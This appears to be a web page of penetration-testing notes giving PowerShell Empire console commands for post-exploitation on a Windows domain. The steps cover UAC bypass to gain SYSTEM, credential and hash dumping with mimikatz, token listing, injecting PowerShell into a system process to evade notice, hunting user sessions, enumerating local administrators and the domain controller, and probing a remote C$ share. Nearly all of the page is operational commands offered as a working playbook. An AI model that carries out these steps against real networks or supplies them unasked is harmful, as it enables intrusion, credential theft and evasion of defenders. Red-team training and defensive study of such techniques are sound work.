top of page

 2. NETWORK ENUMERATION  

 Interacting with Agent  

(empire: ) > agents

(empire: ) > interact [agent-name]

 Using powerup/allchecks  module for privilege escalation  

( Invoke all checks to find Privilege escalation then use BypassUAC)

(empire: agentname) > usemodule privesc/powerup/allchecks

(empire: agentname) > execute         ( make sure itself vulnerable to bypass UAC)

(empire: agentname) > bypassuac [name of listener]

[>] Module is not opsec safe, run [y/N]  > y

 

[if successful will create another agent with system privilege]

(empire: agentname) > back

(empire: agents) > list

 Getting password hashes & creds (requires system/admin priv) 

(empire: agentname) > mimikatz

(empire: agentname) > creds

 Viewing Tokens on the local box  

(empire: agentname) > usemodule credentials/tokens

(empire: agentname) > info

(empire: agentname) > execute

------------------------------------------------------------------------------------------------------------

Domain                                username           processID

xxxxx                                        xxxx                       512

------------------------------------------------------------------------------------------------------------

 Injecting Powershell into another process to blend with the environment  

(empire: agentname) > usemodule management/psinject

(empire: agentname) > info

(empire: agentname) > set ProcID [512]                 (Identify the system process)

(empire: agentname) > set listener [nameoflistener]

(empire: agentname) > execute

[if successful will create another agent ]

 Finding out more about particular user  

(empire: agentname) > usemodule situational_awareness/network/powerview/get_user

(empire: agentname) > info

(empire: agentname) > set UserName [nameofuser]                 (name of a user )

(empire: agentname) > execute

 Finding out where users are on the network  

(empire: agentname) > usemodule situational_awareness/network/powerview/user_hunter

(empire: agentname) > info

(empire: agentname) > set UserName [nameofuser]                 (name of a user )

(empire: agentname) > execute

------------------------------------------------------------------------------------------------------------

xxx                         xxxx                                       session  from

xxxxx                    xxxx                                          10.1.12.15

------------------------------------------------------------------------------------------------------------

 Return a list of all current users in a specified local group on local or remote host  

(empire: agentname) > usemodule situational_awareness/network/powerview/get_localgroup

(empire: agentname) > info

(empire: agentname) > set GroupName [nameofgroup]     (name of group Administrators )

(empire: agentname) > set HostName [ipoftgt]                   (Ip address of target)

(empire: agentname) > set Recurse True

(empire: agentname) > set Agent  [nameofagent]                              (Should be there by default , if not add)

(empire: agentname) > execute

 

------------------------------------------------------------------------------------------------------------------------------------------

Identify any users that you have credential for, if they might be in administrator group

-----------------------------------------------------------------------------------------------------------------------------------------

 Finding about Domain Controller 

(empire: agentname) > usemodule situational_awareness/network/powerview/get_domaincontroller

(empire: agentname) > execute

------------------------------------------------------------------------------------------------------------

OSVersion

Domain

Ip Address

Name:     FQDN

------------------------------------------------------------------------------------------------------------

(empire: agentname) > shell dir \\FQDN\c$               (checking if we can list c: Drive)

[Result of dir ]

bottom of page